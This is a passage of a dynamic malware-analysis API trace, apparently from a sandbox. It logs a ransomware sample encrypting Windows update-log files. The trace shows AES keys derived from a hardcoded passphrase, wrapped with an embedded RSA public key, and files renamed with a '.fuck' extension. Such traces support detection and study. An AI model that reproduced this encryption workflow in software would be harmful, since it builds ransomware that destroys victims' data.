lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9dcd8*=0x10, lpOverlapped=0x0) returned 1 [0241.068] CloseHandle (hObject=0xffffffff) returned 1 [0241.068] CloseHandle (hObject=0x5d10) returned 1 [0241.072] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.001.etl.gsg" (normalized: "c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.001.etl.gsg"), lpNewFileName="C:\\\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.001.etl" (normalized: "c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.001.etl"), bFailIfExists=0) returned 0 [0241.079] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.001.etl", dwFileAttributes=0x2000) returned 0 [0241.079] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.001.etl.gsg" (normalized: "c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.001.etl.gsg")) returned 1 [0241.081] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.001.etl" (normalized: "c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.001.etl"), lpNewFileName="C:\\\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.001.etl.fuck" (normalized: "c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.001.etl.fuck")) returned 0 [0241.081] CryptDestroyHash (hHash=0x28e8578) returned 1 [0241.081] CryptDestroyKey (hKey=0x28e7978) returned 1 [0241.081] CryptReleaseContext (hProv=0x28f6348, dwFlags=0x0) returned 1 [0241.081] FindNextFileA (in: hFindFile=0x28e84f8, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0241.081] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9ecd4 | out: lpSystemTimeAsFileTime=0x2b9ecd4) [0241.081] GetLastError () returned 0x5 [0241.081] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.002.etl" (normalized: "c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.002.etl")) returned 0x2020 [0241.082] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.002.etl", dwFileAttributes=0x80) returned 0 [0241.083] CreateFileA (lpFileName="C:\\\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.002.etl" (normalized: "c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.002.etl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0241.083] CreateFileA (lpFileName="C:\\\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.002.etl.gsg" (normalized: "c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.002.etl.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d10 [0241.084] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.002.etl.gsg", dwFileAttributes=0x2) returned 1 [0241.085] CryptAcquireContextA (in: phProv=0x2b9dcd0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9dcd0*=0x28f6348) returned 1 [0241.087] CryptCreateHash (in: hProv=0x28f6348, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9dcd4 | out: phHash=0x2b9dcd4) returned 1 [0241.087] lstrlenA (lpString="qEREZXpzESADZCNMHncAEFNjzMlQm") returned 29 [0241.088] CryptHashData (hHash=0x28e8638, pbData=0x2ecb70, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0241.088] CryptDeriveKey (in: hProv=0x28f6348, Algid=0x6610, hBaseData=0x28e8638, dwFlags=0x1000000, phKey=0x2b9dcc0 | out: phKey=0x2b9dcc0*=0x28e7978) returned 1 [0241.088] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0241.088] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9dcdc, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8 | out: pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8) returned 1 [0241.088] CryptAcquireContextA (in: phProv=0x2b9dccc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9dccc*=0x28f30d0) returned 1 [0241.088] CryptImportPublicKeyInfo (in: hCryptProv=0x28f30d0, dwCertEncodingType=0x1, pInfo=0x2907228*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2907258*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2907260*, PublicKey.cUnusedBits=0x0), phKey=0x2b9dcc4 | out: phKey=0x2b9dcc4*=0x28e7e38) returned 1 [0241.088] CryptEncrypt (in: hKey=0x28e7e38, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x80) returned 1 [0241.088] CryptEncrypt (in: hKey=0x28e7e38, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28f2fc0*, pdwDataLen=0x2b9dcc8*=0x18, dwBufLen=0x80 | out: pbData=0x28f2fc0*, pdwDataLen=0x2b9dcc8*=0x80) returned 1 [0241.089] WriteFile (in: hFile=0x5d10, lpBuffer=0x28f2fc0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x28f2fc0*, lpNumberOfBytesWritten=0x2b9dcd8*=0x80, lpOverlapped=0x0) returned 1 [0241.090] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9dcd8*=0x0, lpOverlapped=0x0) returned 0 [0241.090] CryptEncrypt (in: hKey=0x28e7978, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9dcd8*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9dcd8*=0x10) returned 1 [0241.090] WriteFile (in: hFile=0x5d10, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9dcd8*=0x10, lpOverlapped=0x0) returned 1 [0241.090] CloseHandle (hObject=0xffffffff) returned 1 [0241.090] CloseHandle (hObject=0x5d10) returned 1 [0241.093] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.002.etl.gsg" (normalized: "c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.002.etl.gsg"), lpNewFileName="C:\\\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.002.etl" (normalized: "c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.002.etl"), bFailIfExists=0) returned 0 [0241.102] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.002.etl", dwFileAttributes=0x2000) returned 0 [0241.102] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.002.etl.gsg" (normalized: "c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.002.etl.gsg")) returned 1 [0241.103] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.002.etl" (normalized: "c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.002.etl"), lpNewFileName="C:\\\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.002.etl.fuck" (normalized: "c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.002.etl.fuck")) returned 0 [0241.104] CryptDestroyHash (hHash=0x28e8638) returned 1 [0241.104] CryptDestroyKey (hKey=0x28e7978) returned 1 [0241.104] CryptReleaseContext (hProv=0x28f6348, dwFlags=0x0) returned 1 [0241.104] FindNextFileA (in: hFindFile=0x28e84f8, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0241.104] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9ecd4 | out: lpSystemTimeAsFileTime=0x2b9ecd4) [0241.104] GetLastError () returned 0x5 [0241.104] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.003.etl" (normalized: "c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.003.etl")) returned 0x2020 [0241.108] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.003.etl", dwFileAttributes=0x80) returned 0 [0241.108] CreateFileA (lpFileName="C:\\\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.003.etl" (normalized: "c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.003.etl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0241.109] CreateFileA (lpFileName="C:\\\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.003.etl.gsg" (normalized: "c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.003.etl.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d10 [0241.109] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.003.etl.gsg", dwFileAttributes=0x2) returned 1 [0241.110] CryptAcquireContextA (in: phProv=0x2b9dcd0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9dcd0*=0x28f6348) returned 1 [0241.112] CryptCreateHash (in: hProv=0x28f6348, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9dcd4 | out: phHash=0x2b9dcd4) returned 1 [0241.112] lstrlenA (lpString="qEREZXpzESADZCNMHncAEFNjzMlQm") returned 29 [0241.112] CryptHashData (hHash=0x28e8578, pbData=0x2ec878, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0241.112] CryptDeriveKey (in: hProv=0x28f6348, Algid=0x6610, hBaseData=0x28e8578, dwFlags=0x1000000, phKey=0x2b9dcc0 | out: phKey=0x2b9dcc0*=0x28e7978) returned 1 [0241.113] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0241.113] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9dcdc, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8 | out: pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8) returned 1 [0241.113] CryptAcquireContextA (in: phProv=0x2b9dccc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9dccc*=0x28f3158) returned 1 [0241.113] CryptImportPublicKeyInfo (in: hCryptProv=0x28f3158, dwCertEncodingType=0x1, pInfo=0x29077d8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2907808*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2907810*, PublicKey.cUnusedBits=0x0), phKey=0x2b9dcc4 | out: phKey=0x2b9dcc4*=0x28e7bf8) returned 1 [0241.113] CryptEncrypt (in: hKey=0x28e7bf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x80) returned 1 [0241.113] CryptEncrypt (in: hKey=0x28e7bf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28f3510*, pdwDataLen=0x2b9dcc8*=0x18, dwBufLen=0x80 | out: pbData=0x28f3510*, pdwDataLen=0x2b9dcc8*=0x80) returned 1 [0241.113] WriteFile (in: hFile=0x5d10, lpBuffer=0x28f3510*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x28f3510*, lpNumberOfBytesWritten=0x2b9dcd8*=0x80, lpOverlapped=0x0) returned 1 [0241.114] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9dcd8*=0x0, lpOverlapped=0x0) returned 0 [0241.115] CryptEncrypt (in: hKey=0x28e7978, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9dcd8*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9dcd8*=0x10) returned 1 [0241.115] WriteFile (in: hFile=0x5d10, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9dcd8*=0x10, lpOverlapped=0x0) returned 1 [0241.115] CloseHandle (hObject=0xffffffff) returned 1 [0241.115] CloseHandle (hObject=0x5d10) returned 1 [0241.126] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.003.etl.gsg" (normalized: "c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.003.etl.gsg"), lpNewFileName="C:\\\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.003.etl" (normalized: "c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.003.etl"), bFailIfExists=0) returned 0 [0241.133] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.003.etl", dwFileAttributes=0x2000) returned 0 [0241.133] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.003.etl.gsg" (normalized: "c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.003.etl.gsg")) returned 1 [0241.135] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.003.etl" (normalized: "c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.003.etl"), lpNewFileName="C:\\\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.003.etl.fuck" (normalized: "c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.003.etl.fuck")) returned 0 [0241.136] CryptDestroyHash (hHash=0x28e8578) returned 1 [0241.136] CryptDestroyKey (hKey=0x28e7978) returned 1 [0241.136] CryptReleaseContext (hProv=0x28f6348, dwFlags=0x0) returned 1 [0241.136] FindNextFileA (in: hFindFile=0x28e84f8, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0241.136] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9ecd4 | out: lpSystemTimeAsFileTime=0x2b9ecd4) [0241.136] GetLastError () returned 0x5 [0241.136] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.004.etl" (normalized: "c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.004.etl")) returned 0x2020 [0241.136] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.004.etl", dwFileAttributes=0x80) returned 0 [0241.137] CreateFileA (lpFileName="C:\\\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.004.etl" (normalized: "c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.004.etl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0241.137] CreateFileA (lpFileName="C:\\\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.004.etl.gsg" (normalized: "c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.004.etl.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d10 [0241.137] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.004.etl.gsg", dwFileAttributes=0x2) returned 1 [0241.138] CryptAcquireContextA (in: phProv=0x2b9dcd0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9dcd0*=0x28f6348) returned 1 [0241.140] CryptCreateHash (in: hProv=0x28f6348, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9dcd4 | out: phHash=0x2b9dcd4) returned 1 [0241.140] lstrlenA (lpString="qEREZXpzESADZCNMHncAEFNjzMlQm") returned 29 [0241.141] CryptHashData (hHash=0x28e8578, pbData=0x2ec878, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0241.141] CryptDeriveKey (in: hProv=0x28f6348, Algid=0x6610, hBaseData=0x28e8578, dwFlags=0x1000000, phKey=0x2b9dcc0 | out: phKey=0x2b9dcc0*=0x28e7978) returned 1 [0241.141] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0241.141] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9dcdc, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8 | out: pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8) returned 1 [0241.141] CryptAcquireContextA (in: phProv=0x2b9dccc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9dccc*=0x28f2f38) returned 1 [0241.141] CryptImportPublicKeyInfo (in: hCryptProv=0x28f2f38, dwCertEncodingType=0x1, pInfo=0x2907cb8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2907ce8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2907cf0*, PublicKey.cUnusedBits=0x0), phKey=0x2b9dcc4 | out: phKey=0x2b9dcc4*=0x28e80b8) returned 1 [0241.141] CryptEncrypt (in: hKey=0x28e80b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x80) returned 1 [0241.141] CryptEncrypt (in: hKey=0x28e80b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28f3c80*, pdwDataLen=0x2b9dcc8*=0x18, dwBufLen=0x80 | out: pbData=0x28f3c80*, pdwDataLen=0x2b9dcc8*=0x80) returned 1 [0241.142] WriteFile (in: hFile=0x5d10, lpBuffer=0x28f3c80*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x28f3c80*, lpNumberOfBytesWritten=0x2b9dcd8*=0x80, lpOverlapped=0x0) returned 1 [0241.143] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9dcd8*=0x0, lpOverlapped=0x0) returned 0 [0241.143] CryptEncrypt (in: hKey=0x28e7978, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9dcd8*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9dcd8*=0x10) returned 1 [0241.143] WriteFile (in: hFile=0x5d10, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9dcd8*=0x10, lpOverlapped=0x0) returned 1 [0241.143] CloseHandle (hObject=0xffffffff) returned 1 [0241.143] CloseHandle (hObject=0x5d10) returned 1 [0241.150] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.004.etl.gsg" (normalized: "c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.004.etl.gsg"), lpNewFileName="C:\\\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.004.etl" (normalized: "c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.004.etl"), bFailIfExists=0) returned 0 [0241.158] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.004.etl", dwFileAttributes=0x2000) returned 0 [0241.159] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.004.etl.gsg" (normalized: "c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.004.etl.gsg")) returned 1 [0241.160] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.004.etl" (normalized: "c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.004.etl"), lpNewFileName="C:\\\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.004.etl.fuck" (normalized: "c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.004.etl.fuck")) returned 0 [0241.161] CryptDestroyHash (hHash=0x28e8578) returned 1 [0241.161] CryptDestroyKey (hKey=0x28e7978) returned 1 [0241.161] CryptReleaseContext (hProv=0x28f6348, dwFlags=0x0) returned 1 [0241.161] FindNextFileA (in: hFindFile=0x28e84f8, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0241.161] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9ecd4 | out: lpSystemTimeAsFileTime=0x2b9ecd4) [0241.161] GetLastError () returned 0x5 [0241.161] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.005.etl" (normalized: "c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.005.etl")) returned 0x2020 [0241.161] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.005.etl", dwFileAttributes=0x80) returned 0 [0241.162] CreateFileA (lpFileName="C:\\\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.005.etl" (normalized: "c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.005.etl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0241.162] CreateFileA (lpFileName="C:\\\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.005.etl.gsg" (normalized: "c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.005.etl.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d10 [0241.163] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.005.etl.gsg", dwFileAttributes=0x2) returned 1 [0241.164] CryptAcquireContextA (in: phProv=0x2b9dcd0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9dcd0*=0x28f6348) returned 1 [0241.166] CryptCreateHash (in: hProv=0x28f6348, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9dcd4 | out: phHash=0x2b9dcd4) returned 1 [0241.166] lstrlenA (lpString="qEREZXpzESADZCNMHncAEFNjzMlQm") returned 29 [0241.166] CryptHashData (hHash=0x28e8578, pbData=0x2ec878, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0241.166] CryptDeriveKey (in: hProv=0x28f6348, Algid=0x6610, hBaseData=0x28e8578, dwFlags=0x1000000, phKey=0x2b9dcc0 | out: phKey=0x2b9dcc0*=0x28e7978) returned 1 [0241.166] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0241.166] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9dcdc, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8 | out: pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8) returned 1 [0241.166] CryptAcquireContextA (in: phProv=0x2b9dccc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9dccc*=0x28f3378) returned 1 [0241.168] CryptImportPublicKeyInfo (in: hCryptProv=0x28f3378, dwCertEncodingType=0x1, pInfo=0x2906ee8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2906f18*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2906f20*, PublicKey.cUnusedBits=0x0), phKey=0x2b9dcc4 | out: phKey=0x2b9dcc4*=0x28e8178) returned 1 [0241.168] CryptEncrypt (in: hKey=0x28e8178, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x80) returned 1 [0241.168] CryptEncrypt (in: hKey=0x28e8178, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28f31e0*, pdwDataLen=0x2b9dcc8*=0x18, dwBufLen=0x80 | out: pbData=0x28f31e0*, 